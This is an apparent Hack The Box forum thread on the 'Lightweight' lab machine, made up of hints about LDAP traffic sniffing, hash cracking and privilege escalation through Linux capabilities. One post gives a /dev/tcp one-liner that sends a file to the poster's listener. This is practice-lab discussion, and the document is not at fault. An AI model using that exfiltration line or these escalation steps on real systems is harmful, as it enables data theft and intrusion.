Lightweight

Type your comment> @xnand said:

Wow this box was awesome! Didn’t have any knowledge on capabilities… Could never root it if it wasn’t for all the people hinting at them :slight_smile:

For people struggling with root, search well on google for this!

don’t google too hard. while doing the same as you i found literally a write up on this box. complete with l*******1 path names.

I got user & root.

A very nice box, the priv escalation was amazing. RevShell here.

PM if you need help.

Nice box!
Got user, root and root shell in a funny and illustrative box.

Thanks to the creator :smiley:

Nice Box!! learned alot about the ldap request and the forum comments helped.
got all the flags and Rooted!!
Hack The Box

Got user and root, really learned a lot from the box (and this forum),

Thanks to the creator for the fun and challenging experience! Feel free to PM me if you need any help with User or root

Left this box months ago and came back still stuck at the same point , tcpdump doesn’t come up with anything wile listening on either ens33 or lo , only time anything ever comes up I do an ldapsearch that doesn’t contain any bind info

Got User, working on root, I’ve done the whole cap privesc on a different box, cant remember which one atm. So I should pop this bad boy before I head to bed tonight. But before I finish and write my review I want to share a quick tip for anyone doing this box who is having trouble transfering files

cat FILE >& /dev/tcp/YOUR-IP/PORT

should do the trick, just dont forget to setup a netcat listener on your kali box that pipes out to a file.

OKay rooted the box last night. I really enjoyed this box, even with bits of frustration peppered here and there. A good progression from the other begginer box, Irked. Some really fun moments mixed in with confusing moments. Thumbs up, overall. As far as tips go, this thread has everything you need to root the box, likely even within the first 6 pages. but a quick summary for those just jumping to the last page, lol

Initial Foothold - I don’t think you need any hints here!

User - This is two parts, the first part you are going to have to take the motto of backtrak (and I think, Kali) “The quieter you become the more you hear” to heart. If privesc paths seem limited think of ways how you can capture communication between two machines. While sending something to be captured from the different services on the machine. and then to make it easy you can examine what you find on your Kali box with a well known tool that lives under water with wires. Once you find what you’re looking for, think of ways to authenticate on the same machine.

User(Part2) - The second part is your usual, most basic enumeration, look at everything you see in your new home folder and see if anything looks like it might contain interesting data. Check everything thuroughly before you move on. Then once you find what you’re looking for, get it on with johnny boy or a certain hashed feline. Once you have the keys to get in to the locked out place, you’ll have to check everything you find in an IDE or vim.

Root - Eazy Peazy! There is another box on HTB that might help guide you which is named after a famous character in a book we all used to “read” as children. If you’re still having trouble, think of your own capabilities and the capabilities of your kali box (wink wink). The two binaries in your new home folder are your path to root. One is a red herring, the other is the path to the pot o’ gold. Don’t worry about a shell, just worry about escalating your privs to be able to read (and maybe write *wink *wink). There is a certain website that helps tremndously with this, but since I don’t want to give it away and make root TOO easy for you all, I’ll just say its one which ippsec talks about a lot and LOVES to use when rooting linux boxes.

Good luck and Have fun, all!

Can somebody help with the initial user, I am getting nothing interesting in the tc****p output. Stuck on it from 3 days. Please DM.
Thanks

can someone PM on what to do with the trigger and listen part? I am a bit stuck, I have found there is a certain page that takes longer to respond and I am connected with SSH but not sure how to listen and how to listen

Edit: Got user then root shell. PM for any hints (learned a lot from this one and it was good fun). Also thanks to others who helped me out.

Good luck and have fun

hey guys i found ld******2 hash password, but iam really stuck now…
can you pm me for hint?

Got user, and root shell!
An awesome machine to learn a lot about linux capabilities and networking!
Also if you google good enough there are some awesome tutorials about how to do priv esc with that.

Hi guys and girls!
this is my first try on a HTB-box and I really can’t get very far. All I have is a the ssh connectioj to my user account and a few dump-files from wireshark, where i cannot find any useful info yet… getting a little frustrated.

The hints with “capabilities” etc. didn’t helkp me much.
I would very much appreciate any help from you people. Please PM me, if you would like to help a noob out.

Thanks in advance :slight_smile:

Anyone kind enough to PM me with hint on path to User? Hours of getting nowhere, except a priv esc to Root theory. Thanks in advance :slight_smile:

I got some sdbm things, I don’t know how to use them, hel!

Anyone can give me a hint towards the user? Got already some dump and some data, dont know what to do with it. Thanks!

I found two binaries in the dir. And found there is something related to capability
And followed that medium article
But still I am getting permission denied in reading files, even after applying the steps of that article properly.
Any help? Please DM
Thanks

Can anyone help me with the user stage? Send me a pm :slight_smile:

Stuck at the root stage.
Found user.txt.
Found files in /home/ldapuser1 but don’t know how to leverage them to gain root.
Tried to search for certificates and keys to decrypt trafic in pcap but no luck.
Any help would be appreciated.